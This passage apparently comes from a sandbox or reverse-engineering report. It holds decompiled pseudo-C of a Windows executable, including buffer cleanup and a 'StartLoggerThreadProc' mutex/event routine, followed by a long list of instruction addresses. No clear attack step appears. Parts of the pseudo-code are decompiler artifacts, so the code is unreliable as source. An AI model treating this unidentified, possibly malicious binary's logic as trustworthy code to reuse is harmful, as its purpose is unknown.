																				_t912 = _t912 + 0xc;
																			}
																			_t854 = _v52;
																			__eflags = _t854 - 8;
																			if(_t854 < 8) {
																				L120:
																				_t577 = _v312 & 0xfffffffe;
																				__eflags = _t577;
																				_v312 = _t577;
																				goto L121;
																			} else {
																				_t782 = _v72;
																				_t854 = 2 + _t854 * 2;
																				_t676 = _t782;
																				__eflags = _t854 - 0x1000;
																				if(_t854 < 0x1000) {
																					L119:
																					_push(_t854);
																					E012CAE27(_t782);
																					_t912 = _t912 + 8;
																					goto L120;
																				} else {
																					_t767 =  *(_t782 - 4);
																					_t858 = _t854 + 0x23;
																					__eflags = _t676 - _t767 + 0xfffffffc - 0x1f;
																					if(__eflags > 0) {
																						L207:
																						E012CF35F(_t754, _t767, _t858, __eflags);
																						L208:
																						E012A1D70(_t767);
																						asm("in al, 0xa0");
																						asm("cld");
																						_t522 =  *0xa114012a -  *_t767;
																						__eflags = _t522;
																						if(_t522 < 0) {
																							L203:
																							asm("cld");
																							_t902 = _t902 +  *((intOrPtr*)(_t522 - 0x2c));
																							__eflags = _t902;
																							goto L204;
																						} else {
																							_t523 = _t522 -  *_t767;
																							__eflags = _t523;
																							if(_t523 != 0) {
																								L204:
																								_t854 = 0x30;
																								_t884 = _t884 + _t884;
																								asm("adc eax, 0x12ee0bc");
																								while(1) {
																									L65:
																									_t754 = ReleaseMutex;
																									goto L66;
																								}
																							} else {
																								_t524 = _t523 -  *_t767;
																								__eflags =  *0xFFFFFFFF658E2BCA & _t524;
																								_t892 = _t524 -  *_t767;
																								 *0xa29f012a = _t888;
																								asm("int3");
																								asm("int3");
																								asm("int3");
																								asm("int3");
																								asm("int3");
																								asm("int3");
																								asm("int3");
																								asm("int3");
																								asm("int3");
																								asm("int3");
																								asm("int3");
																								asm("int3");
																								_push(_t892);
																								_t893 = _t767;
																								_t768 =  *(_t893 + 0x5c);
																								__eflags = _t768 - 8;
																								if(_t768 < 8) {
																									L216:
																									 *(_t893 + 0x58) = 0;
																									 *(_t893 + 0x5c) = 7;
																									 *((short*)(_t893 + 0x48)) = 0;
																									_t769 =  *(_t893 + 0x44);
																									__eflags = _t769 - 8;
																									if(_t769 < 8) {
																										L221:
																										 *(_t893 + 0x40) = 0;
																										 *(_t893 + 0x44) = 7;
																										 *((short*)(_t893 + 0x30)) = 0;
																										_t770 =  *(_t893 + 0x2c);
																										__eflags = _t770 - 8;
																										if(_t770 < 8) {
																											L226:
																											 *(_t893 + 0x28) = 0;
																											 *(_t893 + 0x2c) = 7;
																											 *((short*)(_t893 + 0x18)) = 0;
																											_t771 =  *(_t893 + 0x14);
																											__eflags = _t771 - 8;
																											if(_t771 < 8) {
																												L231:
																												__eflags = 0;
																												 *(_t893 + 0x10) = 0;
																												 *(_t893 + 0x14) = 7;
																												 *_t893 = 0;
																												return 0;
																											} else {
																												_t532 =  *_t893;
																												_t772 = 2 + _t771 * 2;
																												__eflags = _t772 - 0x1000;
																												if(_t772 < 0x1000) {
																													L230:
																													_push(_t772);
																													E012CAE27(_t532);
																													goto L231;
																												} else {
																													_t868 =  *((intOrPtr*)(_t532 - 4));
																													_t772 = _t772 + 0x23;
																													__eflags = _t532 - _t868 + 0xfffffffc - 0x1f;
																													if(__eflags > 0) {
																														goto L232;
																													} else {
																														_t532 = _t868;
																														goto L230;
																													}
																												}
																											}
																										} else {
																											_t545 =  *((intOrPtr*)(_t893 + 0x18));
																											_t776 = 2 + _t770 * 2;
																											__eflags = _t776 - 0x1000;
																											if(_t776 < 0x1000) {
																												L225:
																												_push(_t776);
																												E012CAE27(_t545);
																												_t912 = _t912 + 8;
																												goto L226;
																											} else {
																												_t868 =  *((intOrPtr*)(_t545 - 4));
																												_t772 = _t776 + 0x23;
																												__eflags = _t545 - _t868 + 0xfffffffc - 0x1f;
																												if(__eflags > 0) {
																													goto L232;
																												} else {
																													_t545 = _t868;
																													goto L225;
																												}
																											}
																										}
																									} else {
																										_t549 =  *((intOrPtr*)(_t893 + 0x30));
																										_t777 = 2 + _t769 * 2;
																										__eflags = _t777 - 0x1000;
																										if(_t777 < 0x1000) {
																											L220:
																											_push(_t777);
																											E012CAE27(_t549);
																											_t912 = _t912 + 8;
																											goto L221;
																										} else {
																											_t868 =  *((intOrPtr*)(_t549 - 4));
																											_t772 = _t777 + 0x23;
																											__eflags = _t549 - _t868 + 0xfffffffc - 0x1f;
																											if(__eflags > 0) {
																												goto L232;
																											} else {
																												_t549 = _t868;
																												goto L220;
																											}
																										}
																									}
																								} else {
																									_t553 =  *((intOrPtr*)(_t893 + 0x48));
																									_t778 = 2 + _t768 * 2;
																									__eflags = _t778 - 0x1000;
																									if(_t778 < 0x1000) {
																										L215:
																										_push(_t778);
																										E012CAE27(_t553);
																										_t912 = _t912 + 8;
																										goto L216;
																									} else {
																										_t868 =  *((intOrPtr*)(_t553 - 4));
																										_t772 = _t778 + 0x23;
																										__eflags = _t553 - _t868 + 0xfffffffc - 0x1f;
																										if(__eflags > 0) {
																											L232:
																											E012CF35F(_t754, _t772, _t868, __eflags);
																											asm("int3");
																											asm("int3");
																											asm("int3");
																											asm("int3");
																											asm("int3");
																											asm("int3");
																											asm("int3");
																											asm("int3");
																											_push(_t902);
																											_t904 = _t912;
																											_t773 = _v528;
																											__eflags = _t773;
																											if(__eflags == 0) {
																												_v4 = L"StartLoggerThreadProc: arg0==NULL";
																												E012CCD74( &_v4, 0x1307820);
																												asm("int3");
																												asm("int3");
																												asm("int3");
																												asm("int3");
																												asm("int3");
																												asm("int3");
																												asm("int3");
																												asm("int3");
																												asm("int3");
																												asm("int3");
																												asm("int3");
																												asm("int3");
																												_push(_t904);
																												_push(_t893);
																												_t895 = _t773;
																												_t539 = WaitForSingleObject(_t895[2], 0xffffffff);
																												__eflags = _t539;
																												if(__eflags == 0) {
																													_push(0xc);
																													_t540 = E012CAE5D(_t754, _t884, _t895, __eflags);
																													 *_t540 = _v8;
																													 *(_t540 + 4) = 0;
																													_t775 = _t895[1];
																													__eflags = _t775;
																													if(_t775 != 0) {
																														 *(_t775 + 4) = _t540;
																														_t775 = _t895[1];
																													}
																													 *(_t540 + 8) = _t775;
																													__eflags =  *_t895;
																													_t895[1] = _t540;
																													if( *_t895 == 0) {
																														 *_t895 = _t540;
																													}
																													ResetEvent(_t895[4]);
																													ReleaseMutex(_t895[2]);
																													_t539 = SetEvent(_t895[3]);
																												}
																												return _t539;
																											} else {
																												L64(); // executed
																												E012D431D(_t754, _t884, _t893, __eflags, 0); // executed
																												__eflags = 0;
																												return 0;
																											}
																										} else {
																											_t553 = _t868;
																											goto L215;
																										}
																									}
																								}
																							}
																						}
																					} else {
																						goto L119;
																					}
																				}
																			}
																		}
																	}
																} else {
																	 *_t754(_t884[0xf]);
																	continue;
																}
															}
														} else {
															break;
														}
													}
													goto L243;
												}
												_t855 = _v76;
												__eflags = _t855 - 8;
												if(_t855 < 8) {
													L73:
													_t856 = _v124;
													_t511 = 0;
													_v80 = 0;
													_v76 = 7;
													_v96 = 0;
													__eflags = _t856 - 8;
													if(_t856 < 8) {
														L77:
														_t857 = _v100;
														__eflags = _t857 - 8;
														if(_t857 < 8) {
															L81:
															_t858 = _v28;
															__eflags = _t858 - 8;
															if(_t858 < 8) {
																L206:
																 *[fs:0x0] = _v20;
																_pop(_t885);
																_pop(_t890);
																_pop(_t755);
																__eflags = _v24 ^ _t902;
																return E012CAE19(_t511, _t755, _v24 ^ _t902, _t858, _t885, _t890);
															} else {
																_t767 = _v48;
																_t858 = 2 + _t858 * 2;
																_t513 = _t767;
																__eflags = _t858 - 0x1000;
																if(_t858 < 0x1000) {
																	L205:
																	_push(_t858);
																	_t511 = E012CAE27(_t767);
																	goto L206;
																} else {
																	_t767 =  *(_t767 - 4);
																	_t858 = _t858 + 0x23;
																	__eflags = _t513 - _t767 + 0xfffffffc - 0x1f;
																	if(__eflags > 0) {
																		goto L207;
																	} else {
																		goto L205;
																	}
																}
															}
														} else {
															_t779 = _v120;
															_t869 = 2 + _t857 * 2;
															_t557 = _t779;
															__eflags = _t869 - 0x1000;
															if(_t869 < 0x1000) {
																L80:
																_push(_t869);
																_t511 = E012CAE27(_t779);
																_t912 = _t912 + 8;
																goto L81;
															} else {
																_t767 =  *(_t779 - 4);
																_t858 = _t869 + 0x23;
																__eflags = _t557 - _t767 + 0xfffffffc - 0x1f;
																if(__eflags > 0) {
																	goto L207;
																} else {
																	goto L80;
																}
															}
														}
													} else {
														_t780 = _v144;
														_t870 = 2 + _t856 * 2;
														_t560 = _t780;
														__eflags = _t870 - 0x1000;
														if(_t870 < 0x1000) {
															L76:
															_push(_t870);
															_t511 = E012CAE27(_t780);
															_t912 = _t912 + 8;
															goto L77;
														} else {
															_t767 =  *(_t780 - 4);
															_t858 = _t870 + 0x23;
															__eflags = _t560 - _t767 + 0xfffffffc - 0x1f;
															if(__eflags > 0) {
																goto L207;
															} else {
																goto L76;
															}
														}
													}
												} else {
													_t781 = _v96;
													_t871 = 2 + _t855 * 2;
													_t563 = _t781;
													__eflags = _t871 - 0x1000;
													if(_t871 < 0x1000) {
														L72:
														_push(_t871);
														E012CAE27(_t781);
														_t912 = _t912 + 8;
														goto L73;
													} else {
														_t767 =  *(_t781 - 4);
														_t858 = _t871 + 0x23;
														__eflags = _t563 - _t767 + 0xfffffffc - 0x1f;
														if(__eflags > 0) {
															goto L207;
														} else {
															goto L72;
														}
													}
												}
												goto L243;
											}
										} else {
											_push(_t719);
											_t888 = E012A1E80(_t752, _t853, 0, 0);
											_t760 = _v96 + _v96;
											_v108 = _t888;
											_t882 = _t888 + _t760;
											_v100 = _t882;
											E012CCDE0(_t882, _t888, 0, _t760);
											_t909 = _t909 + 0xc;
											_v104 = _t882;
											goto L15;
										}
									}
								} else {
									_t723 = GetLastError();
									if(_t723 != 0xea) {
										L24:
										if(_t723 == 0) {
											_v108 = _t723;
											_v104 = _t723;
											_v100 = _t723;
											_push(1);
											_t924 = _t909 - 0xc;
											_v8 = 5;
											_t844 = _t924;
											_v96 = _t844;
											_v96 = 0;
											 *_t844 = _t723;
											_t844[2] = 1;
											_t724 = "\\"; // 0x5c
											 *_t844 = _t724;
											E0129E540(_t844, _t844 + _t844[2], _t844 + _t844[2] - _t844, _v96);
											E012994D0( &_v108,  &_v92);
											_t888 = _v108;
											_t909 =  &(_t924[6]);
											_t881 = 0x2aaaaaab * (_v104 - _t888) >> 0x20 >> 2;
											if((0x2aaaaaab * (_v104 - _t888) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_v104 - _t888) >> 0x20 >> 2) == 2) {
												if( &_v44 != _t888) {
													_t739 =  *(_t888 + 0x10);
													if( *(_t888 + 0x14) >= 8) {
														_t888 =  *_t888;
													}
													E012A1EE0(_t752,  &_v44, _t881, _t882, _t888, _t888, _t739);
													_t888 = _v108;
												}
												_t888 = _t888 + 0x18;
												if( &_v68 != _t888) {
													_t948 =  *(_t888 + 0x14) - 8;
													_t737 =  *(_t888 + 0x10);
													if( *(_t888 + 0x14) >= 8) {
														_t888 =  *_t888;
													}
													E012A1EE0(_t752,  &_v68, _t881, _t882, _t888, _t888, _t737);
												}
											}
											E01298500(_t752,  &_v108, _t882, _t888);
										}
										goto L35;
									} else {
										goto L12;
									}
								}
							}
						} else {
							goto L55;
						}
					}
				}
				L243:
			}













































































































































































































              0x012a98f0
              0x012a98f0
              0x012a98f1
              0x012a98f3
              0x012a98f5
              0x012a9900
              0x012a9901
              0x012a9904
              0x012a9909
              0x012a990b
              0x012a990e
              0x012a990f
              0x012a9910
              0x012a9911
              0x012a9915
              0x012a991e
              0x012a9921
              0x012a9924
              0x012a9927
              0x012a9929
              0x012a9930
              0x012a9935
              0x012a993c
              0x012a9943
              0x012a994a
              0x012a994e
              0x012a9951
              0x012a9954
              0x012a9957
              0x012a995e
              0x012a9962
              0x012a9965
              0x012a9968
              0x012a996f
              0x012a9978
              0x012a9982
              0x012a9988
              0x012a9993
              0x012a9d40
              0x012a9d45
              0x00000000
              0x012a9999
              0x012a999c
              0x012a99a2
              0x00000000
              0x012a99a8
              0x012a99a8
              0x012a99b0
              0x012a99be
              0x012a99c5
              0x012a99e1
              0x012a99c7
              0x012a99cb
              0x012a99d1
              0x012a99d4
              0x012a99d9
              0x012a99d9
              0x012a99e7
              0x012a99ec
              0x012a99f4
              0x012a99f7
              0x012a99f7
              0x012a99fe
              0x012a9bc3
              0x012a9bc8
              0x012a9bcc
              0x012a9bd2
              0x012a9bd9
              0x012a9bdb
              0x012a9bde
              0x012a9be6
              0x012a9bec
              0x012a9bf3
              0x012a9bfa
              0x012a9bfd
              0x012a9bfd
              0x012a9c00
              0x012a9c02
              0x012a9c05
              0x012a9c0c
              0x012a9c11
              0x012a9c14
              0x012a9c17
              0x012a9c1e
              0x012a9c22
              0x012a9c22
              0x012a9c25
              0x012a9c27
              0x012a9c2a
              0x012a9c31
              0x012a9c37
              0x012a9c3b
              0x012a9c41
              0x012a9c44
              0x012a9c49
              0x012a9c4f
              0x012a9c52
              0x012a9c54
              0x012a9c54
              0x012a9c5a
              0x012a9c5f
              0x012a9c5f
              0x012a9c5f
              0x012a9c65
              0x012a9c6b
              0x012a9c71
              0x012a9c74
              0x012a9c79
              0x012a9c82
              0x012a9c87
              0x012a9c87
              0x012a9c8c
              0x012a9c8f
              0x012a9c8f
              0x012a9c94
              0x012a9c9d
              0x012a9ca2
              0x012a9ca2
              0x012a9ca9
              0x012a9caf
              0x012a9caf
              0x012a9cb2
              0x012a9cb4
              0x012a9cb4
              0x012a9cba
              0x012a9cba
              0x012a9cbf
              0x012a9cc5
              0x012a9cc9
              0x012a9cce
              0x012a9cd4
              0x012a9d08
              0x012a9d08
              0x012a9d0e
              0x012a9d4b
              0x012a9d4b
              0x012a9d51
              0x012a9d81
              0x012a9d84
              0x012a9d8c
              0x012a9d8d
              0x012a9d8e
              0x012a9d9c
              0x012a9d53
              0x012a9d53
              0x012a9d56
              0x012a9d5d
              0x012a9d65
              0x012a9d77
              0x012a9d77
              0x012a9d79
              0x00000000
              0x012a9d67
              0x012a9d67
              0x012a9d6a
              0x012a9d75
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012a9d75
              0x012a9d65
              0x012a9d10
              0x012a9d10
              0x012a9d13
              0x012a9d1a
              0x012a9d22
              0x012a9d34
              0x012a9d34
              0x012a9d36
              0x012a9d3b
              0x00000000
              0x012a9d24
              0x012a9d24
              0x012a9d27
              0x012a9d32
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012a9d32
              0x012a9d22
              0x012a9cd6
              0x012a9cd6
              0x012a9cd9
              0x012a9ce0
              0x012a9ce8
              0x012a9cfe
              0x012a9cfe
              0x012a9d00
              0x012a9d05
              0x00000000
              0x012a9cea
              0x012a9cea
              0x012a9ced
              0x012a9cf8
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012a9cf8
              0x012a9ce8
              0x012a9a04
              0x012a9a0b
              0x012a9a12
              0x012a9a18
              0x012a9a1f
              0x012a9a22
              0x012a9a2a
              0x012a9a32
              0x012a9a45
              0x012a9a48
              0x012a9a4a
              0x012a9a4b
              0x012a9a4e
              0x012a9a50
              0x012a9a53
              0x012a9a56
              0x012a9a5b
              0x012a9a90
              0x012a9a90
              0x012a9a93
              0x012a9a9b
              0x012a9aa3
              0x012a9aad
              0x012a9aaf
              0x012a9aaf
              0x012a9ab2
              0x012a9ab2
              0x012a9ab5
              0x012a9ab8
              0x012a9ab8
              0x012a9ac3
              0x012a9ac6
              0x012a9acb
              0x012a9acb
              0x012a9aa5
              0x012a9aa5
              0x012a9aa5
              0x012a9acd
              0x012a9ad0
              0x012a9ad6
              0x00000000
              0x012a9ad8
              0x012a9ada
              0x012a9ade
              0x012a9ae6
              0x012a9afc
              0x012a9afc
              0x012a9afe
              0x012a9b03
              0x012a9b06
              0x00000000
              0x012a9ae8
              0x012a9ae8
              0x012a9aeb
              0x012a9af6
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012a9af6
              0x012a9ae6
              0x012a9a5d
              0x012a9a62
              0x012a9d9f
              0x012a9da4
              0x012a9da4
              0x012a9da9
              0x012a9da9
              0x012a9dae
              0x012a9daf
              0x012a9db0
              0x012a9db1
              0x012a9db3
              0x012a9db5
              0x012a9dc0
              0x012a9dc1
              0x012a9dc7
              0x012a9dcc
              0x012a9dce
              0x012a9dd1
              0x012a9dd2
              0x012a9dd3
              0x012a9dd4
              0x012a9dd8
              0x012a9dde
              0x012a9de3
              0x012a9dec
              0x012a9df2
              0x012a9df9
              0x012a9dfd
              0x012a9e00
              0x012a9e03
              0x012a9e0a
              0x012a9e0e
              0x012a9e14
              0x012a9e1b
              0x012a9e22
              0x012a9e25
              0x012a9e28
              0x012a9e2f
              0x012a9e33
              0x012a9e36
              0x012a9e3a
              0x012a9e42
              0x012a9e42
              0x012a9e42
              0x012a9e50
              0x012a9e50
              0x012a9e50
              0x012a9e57
              0x012a9e5e
              0x012a9e64
              0x012a9e68
              0x012a9e6b
              0x012a9e6e
              0x012a9e74
              0x012a9e78
              0x012a9e7e
              0x012a9e87
              0x012a9e8e
              0x012a9e94
              0x012a9e9a
              0x012a9e9c
              0x00000000
              0x00000000
              0x012a9ea4
              0x012a9ea6
              0x012a9ea8
              0x012a9fc8
              0x012a9fce
              0x00000000
              0x012a9eae
              0x012a9eae
              0x012a9eb9
              0x012a9ebb
              0x012a9ebd
              0x012a9fd4
              0x012a9fd9
              0x012a9fdb
              0x012a9fdd
              0x00000000
              0x012a9fe3
              0x012a9fe3
              0x012a9fe6
              0x012a9fe8
              0x012a9ff4
              0x012a9ff7
              0x012aa015
              0x012a9ff9
              0x012a9ffc
              0x012aa003
              0x012aa00a
              0x012aa00a
              0x012aa01b
              0x012aa01d
              0x012aa01f
              0x012aa022
              0x012aa027
              0x012aa02a
              0x012aa02c
              0x00000000
              0x012aa032
              0x012aa037
              0x012aa041
              0x012aa047
              0x012aa04b
              0x012aa050
              0x012aa058
              0x012aa05a
              0x012aa060
              0x012aa060
              0x012aa063
              0x012aa065
              0x012aa06c
              0x012aa06e
              0x012aa06e
              0x012aa074
              0x012aa075
              0x012aa07d
              0x012aa07d
              0x012aa060
              0x012aa081
              0x012aa084
              0x012aa08a
              0x012aa08f
              0x012aa094
              0x012aa094
              0x012aa09a
              0x012aa09e
              0x012aa0a5
              0x012aa0ab
              0x012aa0ae
              0x012aa0b1
              0x012aa11d
              0x012aa11f
              0x00000000
              0x012aa0b3
              0x012aa0b3
              0x00000000
              0x012aa0ba
              0x012aa0bc
              0x00000000
              0x00000000
              0x012aa0c3
              0x012aa0c5
              0x00000000
              0x00000000
              0x012aa0cc
              0x012aa0d3
              0x012aa0d6
              0x012aa0db
              0x00000000
              0x00000000
              0x012aa0e4
              0x012aa0eb
              0x012aa0ee
              0x012aa0f3
              0x00000000
              0x00000000
              0x012aa0fc
              0x012aa103
              0x012aa106
              0x012aa10b
              0x00000000
              0x00000000
              0x012aa114
              0x012aa116
              0x012aa124
              0x012aa124
              0x012aa127
              0x00000000
              0x00000000
              0x012aa0b3
              0x012aa0b1
              0x012aa12c
              0x012aa12c
              0x012aa132
              0x012aa134
              0x012aa1d0
              0x012aa1d0
              0x012aa1d4
              0x012aa1ea
              0x012aa1ec
              0x012aa6d6
              0x012aa6d6
              0x00000000
              0x012aa1f2
              0x012aa1f2
              0x012aa1f5
              0x012aa1f7
              0x012aa25f
              0x012aa25f
              0x012aa261
              0x012aa263
              0x012aa266
              0x012aa269
              0x012aa2a8
              0x012aa2aa
              0x012aa26b
              0x012aa26b
              0x00000000
              0x012aa272
              0x012aa274
              0x00000000
              0x00000000
              0x012aa27b
              0x012aa27d
              0x00000000
              0x00000000
              0x012aa284
              0x012aa286
              0x00000000
              0x00000000
              0x012aa28d
              0x012aa28f
              0x00000000
              0x00000000
              0x012aa296
              0x012aa298
              0x00000000
              0x00000000
              0x012aa29f
              0x012aa2a1
              0x00000000
              0x00000000
              0x012aa26b
              0x012aa2af
              0x012aa2b2
              0x012aa2b2
              0x012aa2b7
              0x012aa2ba
              0x012aa2bc
              0x012aa2be
              0x012aa2c2
              0x012aa2c5
              0x012aa2c8
              0x012aa2ca
              0x012aa2ca
              0x012aa2cc
              0x012aa2d1
              0x012aa2d6
              0x012aa2e0
              0x012aa2e5
              0x012aa2e9
              0x012aa2ec
              0x012aa2ef
              0x012aa2f1
              0x012aa2f1
              0x012aa2f3
              0x012aa2f8
              0x012aa2fd
              0x012aa307
              0x012aa30c
              0x012aa30c
              0x012aa30f
              0x012aa311
              0x012aa3cf
              0x012aa3cf
              0x012aa3d1
              0x012aa466
              0x012aa469
              0x012aa46b
              0x012aa46d
              0x012aa471
              0x012aa473
              0x012aa475
              0x012aa475
              0x012aa47e
              0x012aa47e
              0x012aa489
              0x012aa497
              0x012aa4a1
              0x012aa4a6
              0x012aa4a9
              0x012aa4ad
              0x012aa4b0
              0x012aa4b2
              0x012aa4b8
              0x012aa4be
              0x012aa4c4
              0x012aa4c7
              0x012aa4dc
              0x012aa4dc
              0x012aa4de
              0x012aa4df
              0x012aa4e4
              0x012aa4e6
              0x012aa4e9
              0x012aa4ec
              0x012aa4f4
              0x012aa4c9
              0x012aa4c9
              0x012aa4c9
              0x012aa4fb
              0x012aa500
              0x012aa506
              0x012aa50b
              0x012aa50e
              0x012aa510
              0x012aa516
              0x012aa51c
              0x012aa522
              0x012aa525
              0x012aa53a
              0x012aa53a
              0x012aa53c
              0x012aa53d
              0x012aa542
              0x012aa544
              0x012aa547
              0x012aa54a
              0x012aa552
              0x012aa527
              0x012aa527
              0x012aa527
              0x012aa559
              0x012aa561
              0x012aa564
              0x012aa569
              0x012aa56c
              0x012aa570
              0x012aa574
              0x012aa576
              0x012aa579
              0x012aa57b
              0x012aa57e
              0x012aa583
              0x012aa583
              0x012aa57b
              0x012aa586
              0x012aa58a
              0x012aa595
              0x012aa59c
              0x012aa5a0
              0x012aa5a4
              0x012aa5b1
              0x012aa5b6
              0x012aa5be
              0x012aa5c3
              0x012aa5cd
              0x012aa5d5
              0x012aa5d8
              0x012aa5dd
              0x012aa5e0
              0x012aa5e6
              0x012aa5e9
              0x00000000
              0x012aa5ef
              0x012aa5ef
              0x012aa5f7
              0x012aa5fd
              0x012aa5ff
              0x00000000
              0x012aa605
              0x012aa605
              0x012aa60b
              0x012aa60e
              0x012aa610
              0x012aa659
              0x012aa659
              0x00000000
              0x012aa612
              0x012aa612
              0x012aa61c
              0x012aa61c
              0x012aa622
              0x012aa62a
              0x012aa62c
              0x012aa632
              0x012aa635
              0x012aa63b
              0x012aa643
              0x012aa649
              0x012aa64b
              0x012aa651
              0x012aa65f
              0x012aa665
              0x012aa665
              0x012aa667
              0x012aa670
              0x012aa685
              0x012aa685
              0x012aa68b
              0x012aa68f
              0x012aa692
              0x012aa6a7
              0x012aa6ad
              0x012aa6af
              0x012aa6b4
              0x012aa6ba
              0x012aa6c1
              0x012aa6c7
              0x012aa6ce
              0x012aa6ce
              0x012aa6af
              0x012aa64b
              0x012aa614
              0x012aa614
              0x012aa61a
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012aa61a
              0x012aa612
              0x012aa610
              0x012aa5ff
              0x012aa6dc
              0x012aa6dd
              0x012aa6e3
              0x012aa6e6
              0x012aa6ec
              0x012aa6f2
              0x012aa6f4
              0x012aa6fa
              0x012aa6fe
              0x012aa707
              0x012aa709
              0x012aa70b
              0x012aa70f
              0x012aa711
              0x012aa713
              0x012aa713
              0x012aa718
              0x012aa71c
              0x012aa71c
              0x012aa721
              0x012aa725
              0x012aa72a
              0x012aa72d
              0x012aa730
              0x012aa733
              0x012aa73f
              0x012aa742
              0x012aa74e
              0x012aa753
              0x012aa744
              0x012aa744
              0x012aa749
              0x012aa749
              0x012aa735
              0x012aa735
              0x012aa73a
              0x012aa73a
              0x012aa756
              0x012aa75f
              0x012aa763
              0x012aa77c
              0x012aa782
              0x012aa784
              0x012aa786
              0x012aa786
              0x012aa784
              0x012aa6fe
              0x012aa6f4
              0x012aa78e
              0x012aa793
              0x012aa796
              0x012aa79b
              0x012aa79e
              0x00000000
              0x012aa3d7
              0x012aa3d7
              0x012aa3da
              0x012aa3e4
              0x012aa3e7
              0x00000000
              0x012aa3ed
              0x012aa3ed
              0x012aa3f1
              0x012aa3f3
              0x012aa3f3
              0x012aa408
              0x012aa40d
              0x012aa414
              0x012aa41b
              0x012aa41e
              0x012aa423
              0x012aa428
              0x012aa42c
              0x012aa42f
              0x012aa432
              0x00000000
              0x012aa434
              0x012aa434
              0x012aa437
              0x012aa43e
              0x012aa440
              0x012aa446
              0x012aa45c
              0x012aa45c
              0x012aa45e
              0x012aa463
              0x00000000
              0x012aa448
              0x012aa448
              0x012aa44b
              0x012aa453
              0x012aa456
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012aa456
              0x012aa446
              0x012aa432
              0x012aa3e7
              0x012aa317
              0x012aa322
              0x012aa329
              0x012aa336
              0x012aa33c
              0x012aa346
              0x012aa35b
              0x012aa367
              0x012aa36c
              0x012aa36f
              0x012aa372
              0x012aa3a6
              0x012aa3ac
              0x012aa3b0
              0x012aa3b5
              0x012aa3bc
              0x012aa3bf
              0x012aa3c7
              0x012aa3cc
              0x00000000
              0x012aa374
              0x012aa374
              0x012aa377
              0x012aa37e
              0x012aa380
              0x012aa386
              0x012aa39c
              0x012aa39c
              0x012aa39e
              0x012aa3a3
              0x00000000
              0x012aa388
              0x012aa388
              0x012aa38b
              0x012aa393
              0x012aa396
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012aa396
              0x012aa386
              0x012aa372
              0x012aa1f9
              0x012aa202
              0x012aa207
              0x012aa20e
              0x012aa213
              0x012aa216
              0x012aa219
              0x012aa24d
              0x012aa24d
              0x012aa257
              0x012aa25c
              0x00000000
              0x012aa21b
              0x012aa21b
              0x012aa21e
              0x012aa225
              0x012aa227
              0x012aa22d
              0x012aa243
              0x012aa243
              0x012aa245
              0x012aa24a
              0x00000000
              0x012aa22f
              0x012aa22f
              0x012aa232
              0x012aa23a
              0x012aa23d
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012aa23d
              0x012aa22d
              0x012aa219
              0x012aa1f7
              0x012aa1d6
              0x012aa1db
              0x012aa1df
              0x00000000
              0x012aa1df
              0x012aa13a
              0x012aa13c
              0x012aa141
              0x012aa144
              0x012aa146
              0x012aa14d
              0x012aa151
              0x012aa156
              0x012aa159
              0x012aa159
              0x012aa15c
              0x012aa15f
              0x012aa164
              0x012aa16b
              0x012aa16d
              0x012aa174
              0x012aa17f
              0x012aa184
              0x012aa184
              0x012aa187
              0x012aa18a
              0x012aa18d
              0x012aa1c1
              0x012aa1c7
              0x012aa1c7
              0x012aa1ca
              0x00000000
              0x012aa18f
              0x012aa18f
              0x012aa192
              0x012aa199
              0x012aa19b
              0x012aa1a1
              0x012aa1b7
              0x012aa1b7
              0x012aa1b9
              0x012aa1be
              0x00000000
              0x012aa1a3
              0x012aa1a3
              0x012aa1a6
              0x012aa1ae
              0x012aa1b1
              0x012aa7d8
              0x012aa7d8
              0x012aa7dd
              0x012aa7dd
              0x012aa7f0
              0x012aa7f4
              0x012aa7fa
              0x012aa7fa
              0x012aa7fc
              0x012aa7a0
              0x012aa7a0
              0x012aa7a1
              0x012aa7a1
              0x00000000
              0x012aa7fe
              0x012aa7fe
              0x012aa7fe
              0x012aa800
              0x012aa7a4
              0x012aa7a4
              0x012aa7a6
              0x012aa7a8
              0x012a9e42
              0x012a9e42
              0x012a9e42
              0x00000000
              0x012a9e42
              0x012aa802
              0x012aa802
              0x012aa804
              0x012aa80c
              0x012aa80d
              0x012aa814
              0x012aa815
              0x012aa816
              0x012aa817
              0x012aa818
              0x012aa819
              0x012aa81a
              0x012aa81b
              0x012aa81c
              0x012aa81d
              0x012aa81e
              0x012aa81f
              0x012aa820
              0x012aa821
              0x012aa823
              0x012aa826
              0x012aa829
              0x012aa85d
              0x012aa85f
              0x012aa866
              0x012aa86d
              0x012aa871
              0x012aa874
              0x012aa877
              0x012aa8ab
              0x012aa8ad
              0x012aa8b4
              0x012aa8bb
              0x012aa8bf
              0x012aa8c2
              0x012aa8c5
              0x012aa8f5
              0x012aa8f7
              0x012aa8fe
              0x012aa905
              0x012aa909
              0x012aa90c
              0x012aa90f
              0x012aa93e
              0x012aa93e
              0x012aa940
              0x012aa947
              0x012aa94e
              0x012aa952
              0x012aa911
              0x012aa911
              0x012aa913
              0x012aa91a
              0x012aa920
              0x012aa934
              0x012aa934
              0x012aa936
              0x00000000
              0x012aa922
              0x012aa922
              0x012aa925
              0x012aa92d
              0x012aa930
              0x00000000
              0x012aa932
              0x012aa932
              0x00000000
              0x012aa932
              0x012aa930
              0x012aa920
              0x012aa8c7
              0x012aa8c7
              0x012aa8ca
              0x012aa8d1
              0x012aa8d7
              0x012aa8eb
              0x012aa8eb
              0x012aa8ed
              0x012aa8f2
              0x00000000
              0x012aa8d9
              0x012aa8d9
              0x012aa8dc
              0x012aa8e4
              0x012aa8e7
              0x00000000
              0x012aa8e9
              0x012aa8e9
              0x00000000
              0x012aa8e9
              0x012aa8e7
              0x012aa8d7
              0x012aa879
              0x012aa879
              0x012aa87c
              0x012aa883
              0x012aa889
              0x012aa8a1
              0x012aa8a1
              0x012aa8a3
              0x012aa8a8
              0x00000000
              0x012aa88b
              0x012aa88b
              0x012aa88e
              0x012aa896
              0x012aa899
              0x00000000
              0x012aa89f
              0x012aa89f
              0x00000000
              0x012aa89f
              0x012aa899
              0x012aa889
              0x012aa82b
              0x012aa82b
              0x012aa82e
              0x012aa835
              0x012aa83b
              0x012aa853
              0x012aa853
              0x012aa855
              0x012aa85a
              0x00000000
              0x012aa83d
